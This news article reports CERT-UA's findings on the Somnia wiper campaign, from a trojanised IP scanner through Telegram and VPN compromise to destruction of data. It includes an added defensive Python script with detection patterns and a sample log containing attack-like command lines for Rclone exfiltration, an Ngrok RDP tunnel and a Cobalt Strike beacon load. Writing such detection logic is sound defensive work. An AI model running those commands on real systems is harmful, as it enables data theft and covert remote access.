Ukrainian CERT Discloses New Data-Wiping Campaign

Ukrainian cyber-experts have discovered a new attack campaign by suspected Russian threat actors that compromises victims’ VPN accounts to access and encrypt networked resources.

The country’s Computer Emergency Response Team (CERT) noted in a new statement that the so-called Somnia ransomware was being used by the FRwL (aka Z-Team), also identified as UAC-0118.

Initial compromise is achieved by tricking victims into downloading “Advanced IP Scanner” software which actually contains Vidar malware. CERT-UA believes this was achieved by initial access brokers (IABs) working for the Russians.

“It should be noted that the Vidar stealer, among other things, steals Telegram session data, which, in the absence of configured two-factor authentication and a passcode, allows unauthorized access to the victim's account,” the statement continued.

“As it turned out, the victim's Telegram was used to transfer VPN connection configuration files (including certificates and authentication data) to users. Given the lack of two-factor authentication when establishing a VPN connection, attackers were able to gain an unauthorized connection to the corporate network.”

Once inside, attackers conducted reconnaissance work using the Netscan tool and then launched Cobalt Strike Beacon, exfiltrating data using the Rclone program. There are also signs of the threat actors using Anydesk and Ngrok at this stage.
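The post-compromise stage described above (network scanning, Cobalt Strike Beacon, Rclone exfiltration, AnyDesk and Ngrok) is where defenders have the best chance of catching this chain before the wiper runs. The script below is an added example, not code from the article or from CERT-UA: it triages process-creation log lines for the tools named in the statement and scores each host by how many distinct stages appear. The log layout, host names, file paths and the regular expressions are constructed assumptions for the demo, not published signatures.

```python
"""Added example (not from the CERT-UA statement or the article): triage of
process-creation log lines for the post-exploitation tooling named in the
report (Netscan, Cobalt Strike Beacon, Rclone, AnyDesk, Ngrok).
Log lines, field layout, host names and patterns are constructed assumptions."""
import re
from collections import defaultdict

# One pattern per tool named in the article. These are assumptions about how
# the tools typically show up in a command line, not indicators from CERT-UA.
TOOL_PATTERNS = {
    "netscan":       re.compile(r"\bnetscan(\.exe)?\b", re.I),
    "cobalt_strike": re.compile(r"\bbeacon(\.dll|\.exe)?\b", re.I),
    "rclone":        re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I),
    "anydesk":       re.compile(r"\banydesk(\.exe)?\b", re.I),
    "ngrok":         re.compile(r"\bngrok(\.exe)?\b", re.I),
}

# Constructed sample lines: "timestamp host user image cmdline".
SAMPLE_LOG = """\
2022-10-03T08:12:01Z WS-0142 j.doe C:\\Tools\\netscan.exe netscan.exe /range:10.0.0.0/16
2022-10-03T08:40:17Z WS-0142 j.doe C:\\Windows\\System32\\rundll32.exe rundll32.exe C:\\Users\\j.doe\\beacon.dll,StartW
2022-10-03T09:05:44Z WS-0142 j.doe C:\\Users\\j.doe\\rclone.exe rclone.exe copy D:\\Share remote:bucket --transfers 8
2022-10-03T09:07:10Z WS-0142 j.doe C:\\ProgramData\\AnyDesk\\AnyDesk.exe AnyDesk.exe --service
2022-10-03T09:09:55Z WS-0142 j.doe C:\\Users\\j.doe\\ngrok.exe ngrok.exe tcp 3389
2022-10-03T09:30:00Z WS-0099 a.smith C:\\Windows\\explorer.exe explorer.exe
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, host, user, cmdline)."""
    ts, host, user, _image, cmdline = line.split(" ", 4)
    return ts, host, user, cmdline


def triage(log_text):
    """Return {host: [(timestamp, tool, cmdline), ...]} for every line whose
    command line matches one of the tool patterns, in log order."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _user, cmdline = parse_line(line)
        for tool, pattern in TOOL_PATTERNS.items():
            if pattern.search(cmdline):
                hits[host].append((ts, tool, cmdline))
                break  # one tool label per line is enough for triage
    return dict(hits)


def chain_score(events):
    """Number of distinct tools seen on one host. Several stages of the
    described chain (scan, beacon, exfiltration, remote access, tunnelling)
    on the same host is a far stronger signal than any single tool."""
    return len({tool for _ts, tool, _cmd in events})


if __name__ == "__main__":
    for host, events in triage(SAMPLE_LOG).items():
        print(f"{host}: {chain_score(events)} distinct tools observed")
        for ts, tool, cmd in events:
            print(f"  {ts} {tool:14s} {cmd}")
```

In the constructed sample only WS-0142 is flagged, with all five stages present; a host showing one legitimate AnyDesk install would score 1 and can be reviewed with less urgency. In a real environment the same logic would run over EDR or Sysmon process-creation events, and the patterns would be tuned to the organisation's approved tooling.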

It’s unclear how widespread the campaign was, although “several” Ukrainian organizations are thought to have been impacted since spring 2022.

Most pointedly, CERT-UA confirmed that the end goal is not to generate profits from a ransom but to destroy victim environments.

“Note that the Somnia malware has also undergone changes. The first version of the program used the symmetric 3DES algorithm. In the second version, the AES algorithm is implemented,” it concluded.

“At the same time, taking into account the dynamics of the key and the initialization vector, this version of Somnia, according to the attackers’ theoretical plan, does not provide for the possibility of data decryption.”
